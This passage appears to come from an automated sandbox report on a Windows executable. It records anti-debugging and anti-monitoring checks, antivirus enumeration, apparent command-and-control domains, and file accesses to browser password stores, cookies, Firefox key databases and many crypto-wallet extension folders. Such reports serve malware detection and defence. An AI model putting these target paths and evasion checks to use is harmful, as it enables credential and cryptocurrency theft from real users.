                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: wf1Ps82LYF.exe, wf1Ps82LYF.exe, 00000000.00000003.1615918286.0000000001038000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1615918286.0000000001068000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1616158782.000000000106A000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001068000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1565544561.0000000001068000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1540480401.0000000001068000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1578765912.0000000001068000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000002.1617896976.0000000001038000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1540788781.0000000001068000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000002.1618045816.000000000106C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: wf1Ps82LYF.exe, 00000000.00000002.1617099230.0000000000A80000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: SICE
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: wf1Ps82LYF.exe, 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: debonairnukk.xyz
                Source: wf1Ps82LYF.exe, 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: diffuculttan.xyz
                Source: wf1Ps82LYF.exe, 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: effecterectz.xyz
                Source: wf1Ps82LYF.exe, 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: deafeninggeh.biz
                Source: wf1Ps82LYF.exe, 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: immureprech.biz
                Source: wf1Ps82LYF.exe, 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: tacitglibbr.biz
                Source: wf1Ps82LYF.exe, 00000000.00000002.1617099230.0000000000A80000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: on?!aProgram Manager
                Source: wf1Ps82LYF.exe, 00000000.00000002.1617099230.0000000000A80000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: n?!aProgram Manager
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: wf1Ps82LYF.exe, 00000000.00000003.1565482886.00000000010CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: wf1Ps82LYF.exe, 00000000.00000003.1565482886.00000000010CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fender\MsMpeng.exe
                Source: wf1Ps82LYF.exe, 00000000.00000003.1565482886.00000000010CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ws Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: wf1Ps82LYF.exe PID: 7588, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: wf1Ps82LYF.exeString found in binary or memory: Wallets/Electrum
                Source: wf1Ps82LYF.exeString found in binary or memory: Wallets/ElectronCash
                Source: wf1Ps82LYF.exeString found in binary or memory: window-state.json
                Source: wf1Ps82LYF.exe, 00000000.00000003.1616132956.00000000010C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "en":"cjelfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfo
                Source: wf1Ps82LYF.exe, 00000000.00000003.1540480401.0000000001068000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: wf1Ps82LYF.exeString found in binary or memory: Wallets/Exodus
                Source: wf1Ps82LYF.exeString found in binary or memory: Wallets/Ethereum
                Source: wf1Ps82LYF.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: wf1Ps82LYF.exeString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
